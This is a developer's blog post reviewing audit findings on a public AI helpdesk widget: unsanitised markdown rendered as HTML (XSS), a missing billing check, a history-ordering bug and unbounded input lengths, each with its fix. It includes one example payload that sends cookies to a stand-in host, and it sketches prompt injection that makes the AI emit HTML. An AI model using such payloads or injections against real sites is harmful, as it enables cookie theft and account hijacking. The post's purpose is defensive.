I built the helpdesk widget. Nine files, two database tables, a public streaming endpoint, a Svelte 5 chat component, and an admin dashboard. The build passed. The feature worked. I was confident.
Then the first auditor opened HelpdeskWidget.svelte at line 348 and found this:
svelte{@html renderMd(msg.content || '')}Where renderMd was:
typescriptfunction renderMd(text: string): string {
return marked.parse(text) as string;
}No sanitization. On a public, unauthenticated endpoint.
Critical 1: XSS via Unsanitized Markdown
The chain of exploitation is straightforward:
- A visitor types a message designed to make the AI include specific HTML in its response
- The AI is generally resistant to outputting raw HTML, but it is not immune -- particularly with creative prompt injection
marked.parse()converts markdown to HTML, including any raw HTML the AI outputs{@html}in Svelte injects that HTML into the DOM without escaping<img src=x onerror="document.location='https://evil.com?c='+document.cookie">executes
The attack is not theoretical. marked is designed to render HTML -- it passes through <script>, <img onerror>, <svg onload>, and every other XSS vector. The {@html} directive in Svelte explicitly bypasses Svelte's built-in escaping. Together, they create an injection path from AI output to DOM execution.
On the existing chat endpoint, this is less concerning -- the user is authenticated and only sees their own AI responses. On the helpdesk, the endpoint is public. Any visitor can craft messages. The AI's response is rendered in every subsequent visitor's browser if they resume the same conversation from localStorage.
The Fix
typescriptimport DOMPurify from 'isomorphic-dompurify';
function renderMd(text: string): string {
const html = marked.parse(text) as string;
return DOMPurify.sanitize(html);
}DOMPurify strips event handlers (onerror, onload, onclick), removes <script> tags, sanitizes <iframe> embeds, and cleans other dangerous patterns while preserving safe HTML -- paragraphs, headings, lists, code blocks, links, tables. The output of marked.parse() becomes safe for {@html}.
isomorphic-dompurify was chosen over dompurify because the widget component runs through SvelteKit's SSR path. The isomorphic- wrapper provides a jsdom-based implementation for the server and the native browser implementation for the client. The jsdom dependency adds 8.2 MB to node_modules but does not appear in the client bundle -- Vite tree-shakes it out.
Why I Missed It
I wrote {@html renderMd(...)} because the existing AIChatSection component on the homepage uses the same pattern for rendering markdown. That component is a demo -- it renders hardcoded strings, not AI output. My mental model was "this is how we render markdown in this codebase."
The auditor had no such mental model. They saw {@html} combined with user-influenced content and flagged it immediately. The directive is a well-known XSS vector in Svelte; any code review checklist includes "verify all {@html} sources are sanitized."
Critical 2: No Balance Check Before API Call
The helpdesk endpoint billed the site owner's account. The flow was:
- Receive visitor message
- Stream AI response from Anthropic
- Save messages to database
- Call
deductTokens(accountId, ...)to charge the owner
Step 4 existed. Step 0 -- checkBalance(accountId, ...) -- did not.
Without the balance check, the helpdesk would continue calling the Anthropic API and streaming responses even when the site owner's wallet was empty. Each conversation would deduct tokens, pushing the balance further negative. There was no floor.
The existing chat endpoint has this check at line 86:
typescriptconst balance = await checkBalance(account.id, isByok);
if (!balance.allowed) {
return json({ error: balance.reason }, { status: 402 });
}I copied the streaming logic from the chat endpoint. I copied the tool execution loop, the SSE event format, the token counting, the deductTokens call. I did not copy the balance check because it appeared before the streaming section -- in the authentication block that the helpdesk endpoint does not have.
The auditor found it by following the billing flow: "Where are tokens deducted? Is there a check before the deduction? There is not." A systematic question that the builder skipped because the builder was thinking about streaming, not billing.
The Fix
typescript// Check billing balance before calling the API
const balance = await checkBalance(accountId, false);
if (!balance.allowed) {
return json({ error: 'Helpdesk temporarily unavailable.' }, { status: 503 });
}The error message is deliberately vague. A public visitor should not learn that the site owner has insufficient AI credits. "Temporarily unavailable" communicates the right information (try again later) without leaking billing state.
The Important Findings
The first audit found two more issues at the Important level:
History Retrieval Order
The original code loaded conversation history like this:
typescriptconst history = await prisma.helpdeskMessage.findMany({
where: { conversationId: conversation.id },
orderBy: { createdAt: 'asc' },
take: MAX_CONTEXT_MESSAGES,
select: { role: true, content: true },
});orderBy: 'asc' with take: 20 returns the first 20 messages. For a conversation with 30 messages, the AI would see messages 1-20 and miss messages 21-30 -- the most recent and most relevant context.
The fix was orderBy: 'desc' (get the last 20), then .reverse() (put them in chronological order for the API).
typescriptconst historyDesc = await prisma.helpdeskMessage.findMany({
where: { conversationId: conversation.id },
orderBy: { createdAt: 'desc' },
take: MAX_CONTEXT_MESSAGES,
select: { role: true, content: true },
});
const history = historyDesc.reverse();I wrote orderBy: 'asc' because I wanted chronological order. I forgot that take applies to the sorted result set, not the original table. The code did what I told it to do, not what I intended.
Input Length Validation
The endpoint accepted sessionId without a length limit. The session ID is used as a key in the in-memory rate limiter Map. An attacker sending requests with unique 10,000-character session IDs could exhaust server memory -- not quickly, but steadily.
Similarly, visitorName, visitorEmail, and pageUrl were stored in PostgreSQL without length validation. While Prisma does not have SQL injection vulnerabilities, storing arbitrarily long strings wastes database space and could cause UI issues in the admin dashboard.
The fix was straightforward truncation:
typescriptif (sessionId.length > 100) return json({ error: '...' }, { status: 400 });
const sanitizedName = typeof visitorName === 'string' ? visitorName.slice(0, 100) : null;
const sanitizedEmail = typeof visitorEmail === 'string' ? visitorEmail.slice(0, 254) : null;
const sanitizedPageUrl = typeof pageUrl === 'string' ? pageUrl.slice(0, 2000) : null;Round 2: The Admin Endpoints
The second auditor verified all Round 1 fixes and then turned attention to the code the first auditor spent less time on: the admin endpoints.
Two new Important findings:
- Admin search parameter unbounded: The
searchquery parameter was passed directly to Prismacontainsqueries without length limits. A 100KB search string would cause database performance degradation. Fix:.slice(0, 200).
- Admin transcript unlimited: The transcript endpoint returned all messages in a conversation without pagination. A conversation at the 200-message cap would return a large payload. Fix:
take: 200on the messages include.
Neither finding is a security vulnerability. Both are robustness issues that would surface under adversarial or extreme usage. The Round 2 auditor found them because they were specifically looking at the admin surface -- an area the Round 1 auditor deprioritized in favor of the public-facing attack surface.
The Scorecard
| Metric | Value |
|---|---|
| Files audited | 9 new/modified + 2 reference |
| Audit sessions | 2 |
| Critical findings | 2 |
| Important findings | 4 |
| Minor findings | 7 |
| Pre-existing issues fixed | 4 (TypeScript errors in chat endpoint) |
| Regressions | 0 |
| New dependencies | 1 (isomorphic-dompurify) |
| Build status after all fixes | Passes |
The Pattern
After auditing six CLI phases and one helpdesk widget, a pattern has emerged in what builders miss:
Builders think in flows. Message in, AI processes, response out. The flow works. The builder moves on.
Auditors think in surfaces. What enters the system? What leaves the system? What is trusted? What is not? The XSS finding came from asking "what HTML can reach the DOM?" The billing finding came from asking "what happens before money is spent?"
Builders inherit assumptions from reference code. I copied the streaming loop from the chat endpoint. The chat endpoint is authenticated -- XSS is a lower concern. The helpdesk endpoint is public -- XSS is critical. The code is the same, but the security context changed. I did not re-evaluate the assumptions.
Auditors have no reference code. They read what exists, not what it was derived from. The absence of DOMPurify is visible. The absence of checkBalance is visible. They are not comparing to the chat endpoint -- they are evaluating the helpdesk endpoint on its own terms.
This is why two sessions find what one session cannot. Not because the auditor is smarter. Because the auditor is differently positioned. The methodology is the multiplier.
This concludes the AI Helpdesk Widget series. The feature is live on sh0.dev -- try it by clicking the chat button in the bottom-right corner of any marketing page.